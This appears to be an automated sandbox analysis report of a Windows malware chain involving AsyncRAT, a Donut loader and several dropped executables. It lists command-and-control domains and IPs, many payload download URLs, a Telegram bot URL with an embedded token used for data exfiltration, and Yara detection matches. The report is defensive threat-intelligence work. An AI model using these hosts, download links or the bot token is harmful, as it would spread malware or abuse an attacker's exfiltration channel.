Source:	Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: 2gwmtZs.exe, 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: sweepyribs.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: 45.200.149.15
Source: Malware configuration extractor	IPs: 185.215.113.43

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E7E0C0 recv,recv,recv,recv,

1_2_00E7E0C0

Source: skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.28.10/003.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2
Source: skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php907001
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php911001
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpB
Source: skotes.exe, 00000009.00000003.3988275528.00000000015BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpZk)
Source: skotes.exe, 00000009.00000002.4662164077.00000000013BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpv
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpxe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpz
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/dkk
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/inr
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/t
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/1434988227/vQeyqr1.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/6165238488/RzAAR0y.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013A1000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/7781867830/2gwmtZs.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/Krokodyl02/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe;U
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/burpin1/random.exeQU
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/fate/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/karl/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/karl/random.exeZ
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/loadman/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/martin/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique1/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/unique2/random.exeBU
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/wicked/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/wicked/random.exeN
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/wicked/random.exej
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exe
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exewU
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 950932ab59.exe, 00000034.00000003.3458081477.000000000155F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro8
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: 0064eff6c8.exe, 00000012.00000002.3072593719.0000000000409000.00000002.00000001.01000000.0000000E.sdmp, 0064eff6c8.exe, 00000012.00000000.3046784847.0000000000409000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: RzAAR0y.exe, 0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vQeyqr1.exe, 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3243887590.000001E680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 28d287a54d.exe, 0000000D.00000000.2915653913.0000000000423000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com0
Source: powershell.exe, 00000032.00000002.3673297976.0000020C3CE85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.P
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: powershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.t.com/pk
Source: powershell.exe, 00000015.00000002.3243887590.000001E680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3512935571.0000020C24691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
Source: vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage?chat_id=14349
Source: powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 950932ab59.exe, 00000034.00000002.3514958295.000000000150B000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3459174810.000000000150A000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/
Source: 950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/M
Source: 950932ab59.exe, 00000034.00000003.3458308983.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3513585853.00000000014E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/S
Source: 950932ab59.exe, 00000034.00000002.3512326183.000000000149E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/V
Source: 950932ab59.exe, 00000034.00000002.3517224743.0000000001563000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000003.3458081477.0000000001563000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/_;
Source: 950932ab59.exe, 00000034.00000003.3458308983.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/api
Source: 950932ab59.exe, 00000034.00000003.3459174810.000000000152D000.00000004.00000020.00020000.00000000.sdmp, 950932ab59.exe, 00000034.00000002.3516065712.000000000152D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apip
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000032.00000002.3512935571.0000020C248B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
Source: powershell.exe, 00000015.00000002.3334972035.000001E6EC1BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000015.00000002.3301643124.000001E69006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3631734294.0000020C346FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: skotes.exe, 00000009.00000002.4668807005.00000000015F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sci.libertyreserve.com/
Source: skotes.exe, 00000009.00000002.4668807005.00000000015A0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.4662164077.00000000013FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: skotes.exe, 00000009.00000002.4662164077.000000000143F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3981391903.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.vQeyqr1.exe.1470000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 14.2.vQeyqr1.exe.1470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe

File dump: service123.exe.24.dr 314617856

Jump to dropped file

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.1.dr	Static PE information: section name:
Source: skotes.exe.1.dr	Static PE information: section name: .idata
Source: random[1].exe.9.dr	Static PE information: section name:
Source: random[1].exe.9.dr	Static PE information: section name: .idata
Source: random[1].exe.9.dr	Static PE information: section name:
Source: 22b0b7688f.exe.9.dr	Static PE information: section name:
